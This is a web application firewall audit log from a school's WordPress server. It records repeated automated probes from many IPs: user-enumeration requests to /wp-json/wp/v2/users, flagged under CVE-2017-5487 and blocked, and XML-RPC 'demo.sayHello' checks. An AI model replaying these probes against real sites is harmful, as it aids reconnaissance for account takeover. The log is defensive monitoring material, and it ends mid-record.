%s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668118263844 17053 (- - -) Stopwatch2: 1746668118263844 17053; combined=26574, p1=560, p2=3502, p3=33, p4=85, p5=11213, sr=78, sw=62, l=0, gc=11119 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aed226d-Z-- --294dfb73-A-- [08/May/2025:08:47:52 +0700] aBwNSI4K347NtBcwXKwFkgAAAII 103.236.140.4 42488 103.236.140.4 8181 --294dfb73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --294dfb73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --294dfb73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668872303603 3078 (- - -) Stopwatch2: 1746668872303603 3078; combined=1272, p1=426, p2=815, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --294dfb73-Z-- --9d07ea4f-A-- [08/May/2025:08:47:58 +0700] aBwNTqcs1DvJ_HgMHE_xqAAAAAo 103.236.140.4 42498 103.236.140.4 8181 --9d07ea4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d07ea4f-C-- demo.sayHello --9d07ea4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d07ea4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668878324117 4099 (- - -) Stopwatch2: 1746668878324117 4099; combined=3286, p1=429, p2=2689, p3=27, p4=33, p5=65, sr=52, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d07ea4f-Z-- --16d6531d-A-- [08/May/2025:08:48:36 +0700] aBwNdKcs1DvJ_HgMHE_xqgAAABA 103.236.140.4 42502 103.236.140.4 8181 --16d6531d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16d6531d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16d6531d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668916013273 2762 (- - -) Stopwatch2: 1746668916013273 2762; combined=1213, p1=404, p2=781, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16d6531d-Z-- --49f12d59-A-- [08/May/2025:08:48:41 +0700] aBwNeacs1DvJ_HgMHE_xrAAAABU 103.236.140.4 42506 103.236.140.4 8181 --49f12d59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --49f12d59-C-- demo.sayHello --49f12d59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --49f12d59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668921752771 4970 (- - -) Stopwatch2: 1746668921752771 4970; combined=3870, p1=479, p2=3128, p3=25, p4=85, p5=90, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49f12d59-Z-- --81564309-A-- [08/May/2025:08:48:54 +0700] aBwNhqcs1DvJ_HgMHE_xrQAAAA8 103.236.140.4 42510 103.236.140.4 8181 --81564309-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --81564309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81564309-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668934403449 2915 (- - -) Stopwatch2: 1746668934403449 2915; combined=1278, p1=447, p2=801, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81564309-Z-- --77544307-A-- [08/May/2025:08:49:01 +0700] aBwNjcP9GxxPAbCroFbMvAAAAEw 103.236.140.4 42514 103.236.140.4 8181 --77544307-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77544307-C-- demo.sayHello --77544307-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77544307-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668941851636 5049 (- - -) Stopwatch2: 1746668941851636 5049; combined=3461, p1=619, p2=2652, p3=43, p4=34, p5=68, sr=78, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77544307-Z-- --01e2be12-A-- [08/May/2025:08:49:19 +0700] aBwNn6cs1DvJ_HgMHE_xrwAAAAA 103.236.140.4 42518 103.236.140.4 8181 --01e2be12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01e2be12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01e2be12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668959078318 3057 (- - -) Stopwatch2: 1746668959078318 3057; combined=1290, p1=432, p2=829, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01e2be12-Z-- --d97e5954-A-- [08/May/2025:08:49:26 +0700] aBwNpqcs1DvJ_HgMHE_xsQAAAAQ 103.236.140.4 42522 103.236.140.4 8181 --d97e5954-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d97e5954-C-- demo.sayHello --d97e5954-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d97e5954-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668966844103 4969 (- - -) Stopwatch2: 1746668966844103 4969; combined=3823, p1=491, p2=3126, p3=25, p4=27, p5=91, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d97e5954-Z-- --7dec1d30-A-- [08/May/2025:08:49:58 +0700] aBwNxqcs1DvJ_HgMHE_xswAAAAI 103.236.140.4 42526 103.236.140.4 8181 --7dec1d30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7dec1d30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dec1d30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668998267204 3501 (- - -) Stopwatch2: 1746668998267204 3501; combined=1458, p1=475, p2=945, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dec1d30-Z-- --778e3741-A-- [08/May/2025:08:50:00 +0700] aBwNyCs5rYyn3jlLjjK_AgAAANU 103.236.140.4 42528 103.236.140.4 8181 --778e3741-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --778e3741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --778e3741-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669000612075 2647 (- - -) Stopwatch2: 1746669000612075 2647; combined=1178, p1=425, p2=715, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --778e3741-Z-- --fc123f73-A-- [08/May/2025:08:50:03 +0700] aBwNy44K347NtBcwXKwFlQAAAIs 103.236.140.4 42534 103.236.140.4 8181 --fc123f73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc123f73-C-- demo.sayHello --fc123f73-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc123f73-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669003831019 5054 (- - -) Stopwatch2: 1746669003831019 5054; combined=3802, p1=463, p2=3124, p3=21, p4=23, p5=98, sr=87, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc123f73-Z-- --47da7273-A-- [08/May/2025:08:50:07 +0700] aBwNz6cs1DvJ_HgMHE_xtwAAAAU 103.236.140.4 42538 103.236.140.4 8181 --47da7273-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47da7273-C-- demo.sayHello --47da7273-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47da7273-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669007454373 5077 (- - -) Stopwatch2: 1746669007454373 5077; combined=3840, p1=441, p2=3192, p3=26, p4=25, p5=91, sr=65, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47da7273-Z-- --d32fd24f-A-- [08/May/2025:08:50:22 +0700] aBwN3qcs1DvJ_HgMHE_xvQAAAAg 103.236.140.4 42556 103.236.140.4 8181 --d32fd24f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d32fd24f-C-- demo.sayHello --d32fd24f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d32fd24f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669022942227 6155 (- - -) Stopwatch2: 1746669022942227 6155; combined=4247, p1=504, p2=3512, p3=33, p4=32, p5=97, sr=71, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d32fd24f-Z-- --58cdab13-A-- [08/May/2025:08:50:41 +0700] aBwN8acs1DvJ_HgMHE_xvwAAABM 103.236.140.4 42560 103.236.140.4 8181 --58cdab13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58cdab13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58cdab13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669041964997 3110 (- - -) Stopwatch2: 1746669041964997 3110; combined=1394, p1=497, p2=866, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58cdab13-Z-- --3b2ba97c-A-- [08/May/2025:08:50:46 +0700] aBwN9is5rYyn3jlLjjK_BAAAANM 103.236.140.4 42566 103.236.140.4 8181 --3b2ba97c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b2ba97c-C-- demo.sayHello --3b2ba97c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b2ba97c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746669046865127 5199 (- - -) Stopwatch2: 1746669046865127 5199; combined=3927, p1=519, p2=3193, p3=28, p4=30, p5=93, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b2ba97c-Z-- --098f245f-A-- [08/May/2025:08:50:56 +0700] aBwOAMP9GxxPAbCroFbMvgAAAFc 103.236.140.4 42570 103.236.140.4 8181 --098f245f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 88.220.137.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 88.220.137.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --098f245f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --098f245f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746669056885222 2369 (- - -) Stopwatch2: 1746669056885222 2369; combined=1036, p1=341, p2=663, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --098f245f-Z-- --acc1231b-A-- [08/May/2025:08:51:48 +0700] aBwONCs5rYyn3jlLjjK_BQAAAMA 103.236.140.4 42574 103.236.140.4 8181 --acc1231b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --acc1231b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acc1231b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 